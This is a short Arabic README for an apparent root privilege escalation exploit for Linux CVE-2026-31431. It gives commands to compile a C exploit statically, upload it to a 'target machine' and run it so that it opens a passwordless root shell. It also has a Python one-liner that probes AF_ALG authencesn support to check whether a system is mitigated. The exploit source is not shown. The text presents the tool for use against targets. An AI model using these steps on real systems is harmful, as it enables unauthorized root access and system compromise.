
استغلال لثغرة CVE-2026-31431 يرفع الصلاحيات إلى صلاحيات الجذر، مع وضع كشف وتنفيذ بلغة C لضمان قابلية النقل.
كشف واختبار CVE-2026-31431
0x01 بدء سريع
بعض البيئات المستهدفة لا تحتوي على Python مثبتًا، لذلك تمت إعادة كتابة منطق تصعيد الامتيازات هذا بلغة C.
قم بتشغيل الأمر التالي على جهاز Linux أو WSL (يُوصى باستخدام -static لتجنب مشكلات إصدار GLIBC):
gcc -static exploit.c -o exploit
2. النشر والتنفيذ
قم برفع الملف الثنائي المُنشأ إلى الجهاز المستهدف:
chmod +x exploit
./exploit
إذا نجح الاستغلال، سيقوم البرنامج تلقائيًا بتنفيذ su و فتح قشرة root مباشرة دون الحاجة إلى كلمة مرور.
إذا كنت تستخدم إصدار python-ex.py على بعض أنظمة التشغيل، فقد تواجه خطأ AttributeError: module 'os' has no attribute 'splice'. لذا يمكنك التحويل إلى إصدار لغة C.
إذا كنت تريد الفحص فقط دون استغلال، يمكنك تشغيل هذا الأمر
python3 -c 'import socket; s=socket.socket(38,5,0); (s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) or print("未缓解")) if s else None' 2>/dev/null || echo "已缓解"